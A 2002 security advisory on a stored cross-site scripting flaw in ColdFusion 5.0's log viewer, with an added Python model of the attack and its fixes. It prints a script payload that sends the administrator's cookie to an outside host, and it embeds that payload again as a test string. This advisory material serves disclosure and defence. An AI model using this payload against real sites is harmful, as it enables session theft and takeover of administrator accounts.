17th Dec 2002 [SBWID-5881]
COMMAND
Cross-site scripting vulnerability in CF
SYSTEMS AFFECTED
CF 5.0
PROBLEM
KiLL CoLe [killcole@yahoo.com] says:
The ColdFusion Administrator allows you to view your application log
via your web browser. Under certain conditions, it is possible to
remotely alter ColdFusion's application log. Take the following code:
<CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
    SELECT * FROM Products
    WHERE ProductId = #int(url.productid)#
</CFQUERY>
If the INT function encounters a value that is not numeric, it throws
an exception and writes the value that was passed to application.log.
Should an unsuspecting administrator view the log file via their web
browser, script could be executed. Analyze this code:
If url.productid (from the above example) were passed in as:

    <iframe name="frame1" width="0" height="0"></iframe>
    <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie=" + document.cookie</script>

this would enable an attacker to steal the value of the ColdFusion
administrator's cookie. Decrypting the ColdFusion admin's password is
well documented, and exposes a mild-moderate threat to server security.
NOTE: There are dozens of other functions that throw exceptions
similar to the INT function.
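The chain described above, modelled in Python as an added example (this is not code from the advisory, from KiLL CoLe, or from ColdFusion itself): a stand-in for int() that writes the rejected value into the application log, the unescaped log viewer the advisory describes, and the two places it can be fixed (validate before int() is ever called so nothing attacker-controlled reaches the log, and HTML-encode each entry when the log is rendered). The log line format and all function names are assumptions; ColdFusion's own equivalents would be IsNumeric() for the check and HTMLEditFormat() for output encoding.

```python
import html
import re
from typing import List, Optional

# Constructed sample input: the payload from the advisory, as it would arrive
# in url.productid (shown here as one string).
XSS_PAYLOAD = (
    '<iframe name="frame1" width="0" height="0"></iframe>'
    '<script>document.frame1.location='
    '"http://www.domain.com/index.cfm?stealcookie=" + document.cookie</script>'
)


def cf_int(value: str, log: List[str]) -> int:
    """Model of int(url.productid). Non-numeric input raises, and the raw
    value is written verbatim to the application log: this is the
    log-injection point. The log line format is an assumption."""
    if re.fullmatch(r"-?\d+", value.strip()) is None:
        log.append(f"Error: parameter passed to int() is not numeric: {value}")
        raise ValueError("int() argument is not numeric")
    return int(value)


def handle_product_request(productid: str, log: List[str], validate: bool) -> Optional[int]:
    """Model of the vulnerable page. Returns the id that reaches the query, or
    None when the request is rejected. With validate=True the value is checked
    before int() runs (CFML: IsNumeric()), so a bad value never hits the log."""
    if validate and re.fullmatch(r"\d+", productid) is None:
        return None
    try:
        return cf_int(productid, log)
    except ValueError:
        return None


def render_log_unescaped(log: List[str]) -> str:
    """The viewer behaviour the advisory describes: entries are dropped into
    the HTML page as-is, so markup inside a log line becomes live markup."""
    return "<html><body><pre>" + "\n".join(log) + "</pre></body></html>"


def render_log_escaped(log: List[str]) -> str:
    """Output-side fix: HTML-encode every entry before it reaches the browser
    (CFML: HTMLEditFormat()). The payload is still in the log, but it is
    displayed as text rather than executed."""
    return "<html><body><pre>" + "\n".join(html.escape(e) for e in log) + "</pre></body></html>"


def contains_active_script(page: str) -> bool:
    """Crude check used only to compare the two renderers: does the page
    contain an un-encoded <script> or <iframe> tag?"""
    return re.search(r"<(script|iframe)\b", page, re.IGNORECASE) is not None


if __name__ == "__main__":
    app_log: List[str] = []
    handle_product_request("42", app_log, validate=False)
    handle_product_request(XSS_PAYLOAD, app_log, validate=False)
    print("log entries after attack:", len(app_log))
    print("unescaped viewer executes script:", contains_active_script(render_log_unescaped(app_log)))
    print("escaped viewer executes script:  ", contains_active_script(render_log_escaped(app_log)))
    clean_log: List[str] = []
    handle_product_request(XSS_PAYLOAD, clean_log, validate=True)
    print("log entries with input validation:", len(clean_log))
```

Both fixes are worth applying: validation stops this particular page from logging attacker input, but the NOTE above applies, since any other function that throws on bad input will still log it, so the log viewer itself must encode what it displays.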
SOLUTION
A patch should be available soon. Until then, check url.productid with
IsNumeric() before passing it to int() so that attacker-supplied strings
never reach application.log, and treat the log as untrusted when viewing it
in a browser (HTML-encode entries, e.g. with HTMLEditFormat(), before
rendering them).